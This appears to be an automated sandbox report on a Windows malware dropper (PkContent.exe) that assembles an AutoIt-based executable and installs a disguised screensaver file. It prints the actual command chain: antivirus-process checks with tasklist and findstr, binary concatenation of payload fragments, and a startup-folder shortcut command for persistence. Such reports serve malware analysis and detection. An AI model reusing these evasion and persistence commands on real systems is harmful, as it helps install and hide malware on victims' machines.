Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: HermesKey.scr.11.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.dr | String found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\PkContent.exe | Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007E4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_00924830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007E4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\PkContent.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007FD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_0093D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

System Summary

Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007D4254 CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007C8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\PkContent.exe | Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code function: 11_2_007D5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code function: 17_2_00915778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\PkContent.exe | File created: C:\Windows\PgJune
Source: C:\Users\user\Desktop\PkContent.exe | File created: C:\Windows\ReceptorsTeeth
Source: C:\Users\user\Desktop\PkContent.exe | File created: C:\Windows\PorcelainExhaust
Source: C:\Users\user\Desktop\PkContent.exe | File created: C:\Windows\MonsterRaymond
Source: C:\Users\user\Desktop\PkContent.exe | File created: C:\Windows\FirewireBros
Source: C:\Users\user\Desktop\PkContent.exe | File created: C:\Windows\PortugalCharges
Source: C:\Users\user\Desktop\PkContent.exe | Code functions: 0_2_0040497C, 0_2_00406ED2, 0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif | Code functions: 11_2_0077B020, 11_2_007794E0, 11_2_00779C80, 11_2_007923F5, 11_2_007F8400, 11_2_007A6502, 11_2_007A265E, 11_2_0077E6F0, 11_2_0079282A, 11_2_007A89BF, 11_2_007A6A74, 11_2_007F0A3A, 11_2_00780BE0, 11_2_0079CD51, 11_2_007CEDB2, 11_2_007D8E44, 11_2_007F0EB7, 11_2_007A6FE6, 11_2_007933B7, 11_2_0078D45D, 11_2_0079F409, 11_2_00771663, 11_2_0078F628, 11_2_007916B4, 11_2_0077F6A0, 11_2_007978C3, 11_2_00791BA8, 11_2_0079DBA5, 11_2_007A9CE5, 11_2_0078DD28, 11_2_0079BFD6, 11_2_00791FC0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr | Code functions: 17_2_008BB020, 17_2_008B94E0, 17_2_008B9C80, 17_2_008D23F5, 17_2_00938400, 17_2_008E6502, 17_2_008BE6F0, 17_2_008E265E, 17_2_008D282A, 17_2_008E89BF, 17_2_00930A3A, 17_2_008E6A74, 17_2_008C0BE0, 17_2_0090EDB2, 17_2_008DCD51, 17_2_00930EB7, 17_2_00918E44, 17_2_008E6FE6, 17_2_008D33B7, 17_2_008DF409, 17_2_008CD45D, 17_2_008BF6A0, 17_2_008D16B4, 17_2_008CF628, 17_2_008B1663, 17_2_008D78C3, 17_2_008D1BA8, 17_2_008DDBA5, 17_2_008E9CE5, 17_2_008CDD28, 17_2_008D1FC0, 17_2_008DBFD6
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: String function: 00790D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: String function: 00781A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: String function: 00798B30 appears 42 times
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: String function: 008D8B30 appears 42 times
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: String function: 008D0D17 appears 70 times
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: String function: 008C1A36 appears 34 times
Source: C:\Users\user\Desktop\PkContent.exeCode function: String function: 004062A3 appears 58 times
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs PkContent.exe
Source: PkContent.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal92.expl.evad.winEXE@28/14@2/0
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DA6AD GetLastError,FormatMessageW,11_2_007DA6AD
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007C8DE9 AdjustTokenPrivileges,CloseHandle,11_2_007C8DE9
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007C9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_007C9399
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00908DE9 AdjustTokenPrivileges,CloseHandle,17_2_00908DE9
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00909399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,17_2_00909399
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_007D4148
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_007D443D
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifFile created: C:\Users\user\AppData\Local\GuardKey SolutionsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Users\user\AppData\Local\Temp\nszFA73.tmpJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
Source: PkContent.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\PkContent.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PkContent.exeReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\PkContent.exeFile read: C:\Users\user\Desktop\PkContent.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\PkContent.exe "C:\Users\user\Desktop\PkContent.exe"
Source: C:\Users\user\Desktop\PkContent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 724598
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "WowLiberalCalOfficer" Weight
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Thermal.pif y
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"
Source: C:\Users\user\Desktop\PkContent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 724598Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "WowLiberalCalOfficer" Weight Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated yJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Thermal.pif yJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"Jump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: PkContent.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
